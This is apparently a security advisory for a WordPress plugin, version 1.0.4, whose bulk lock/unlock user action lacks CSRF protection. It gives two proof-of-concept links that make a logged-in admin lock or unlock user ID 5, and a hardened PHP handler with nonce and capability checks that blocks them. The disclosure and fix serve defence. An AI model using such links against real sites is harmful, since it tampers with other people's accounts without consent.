Description

The plugin does not have a CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged-in admins lock and unlock arbitrary users via a CSRF attack.
Make a logged-in admin open one of the links below; this will make them lock/unlock the user with ID 5:

https://example.com/wp-admin/users.php?action=lock&action2=lock&users[0]=5

https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users[0]=5
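
A hardened bulk handler for this kind of action, as an added example and not the plugin's own code. It assumes the plugin hooks the core `handle_bulk_actions-users` filter; the function name `example_lock_bulk_handler`, the meta key `example_account_locked` and the choice of the `edit_users` capability are hypothetical.

```php
<?php
// Added example: hypothetical handler name and meta key, not the plugin's code.
add_filter( 'handle_bulk_actions-users', 'example_lock_bulk_handler', 10, 3 );

function example_lock_bulk_handler( $redirect_to, $action, $user_ids ) {
	if ( ! in_array( $action, array( 'lock', 'unlock' ), true ) ) {
		return $redirect_to; // Some other bulk action; leave it alone.
	}

	// The Users list table form includes wp_nonce_field( 'bulk-users' ).
	// A link opened from another site carries no valid _wpnonce, so this
	// call stops the request before any account is touched.
	check_admin_referer( 'bulk-users' );

	// The nonce proves intent, not privilege; check the capability as well.
	if ( ! current_user_can( 'edit_users' ) ) {
		wp_die(
			esc_html__( 'You are not allowed to lock or unlock users.' ),
			'',
			array( 'response' => 403 )
		);
	}

	$changed = 0;
	foreach ( array_map( 'absint', (array) $user_ids ) as $user_id ) {
		// Skip invalid IDs and never let an admin lock their own account.
		if ( ! $user_id || get_current_user_id() === $user_id ) {
			continue;
		}
		if ( 'lock' === $action ) {
			update_user_meta( $user_id, 'example_account_locked', 1 );
		} else {
			delete_user_meta( $user_id, 'example_account_locked' );
		}
		$changed++;
	}

	// Report the count back to the list table, e.g. ?example_locked=3.
	return add_query_arg( 'example_' . $action . 'ed', $changed, $redirect_to );
}
```

With this check in place, both links above end at WordPress's nonce failure screen instead of changing the user with ID 5.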
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 1.0.4 |